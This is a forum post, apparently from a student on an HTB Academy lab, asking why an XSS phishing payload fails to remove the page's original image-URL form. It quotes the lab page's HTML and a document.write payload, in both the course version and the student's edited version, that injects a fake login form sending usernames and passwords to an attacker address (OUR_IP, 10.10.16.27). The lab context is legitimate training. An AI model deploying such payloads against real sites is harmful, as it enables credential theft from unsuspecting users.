I’m struggling to remove an input field on the XSS/Phishing module of HTB Academy BBH course.
Basically, I have to carry out an XEE attack on a web page (I can’t seem to get an image to upload for some reason).
Here is the unedited source code for the web page:-
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Online Image Viewer</title>
</head>
<body style="background-color: #141d2b; font-family: sans-serif; color: white;">
<center>
<h1>Online Image Viewer</h1>
<div class="form-group">
<form role="form" action="index.php" method="GET" id='urlform'>
<input type="text" placeholder="Image URL" name="url">
</form>
<br>
</div>
</center>
</body>
</html>
As part of the attack, I have to remove the input box shown in the image to make the page look more legit as a login page.
I’ve used the payload provided on the module page:-
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
The payload creates the login input boxes as normal, but it does not remove the original image URL input box as it is intended to.
I have played around with the payload to comment out the extra bits of code that are displayed after input, which has worked, and the login input boxes are shown as normal, yet I just can’t seem to remove the original image URL input box.
Here is the code I have ended up with after tweaking the payload.
'document.write('<h3>Please login to continue</h3><form action=http://10.10.16.27><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"><document.getElementById('urlform').remove()><!--
I’ve tried multiple different things with the code to remove that Image URL input box, mostly playing around with the closing tags and trying different tags, but I just can’t seem to remove it.
It’s not essential for the module, as the login form will still work; I’d just like to figure out how it’s done so I can understand it better.
Any help or advice is much appreciated.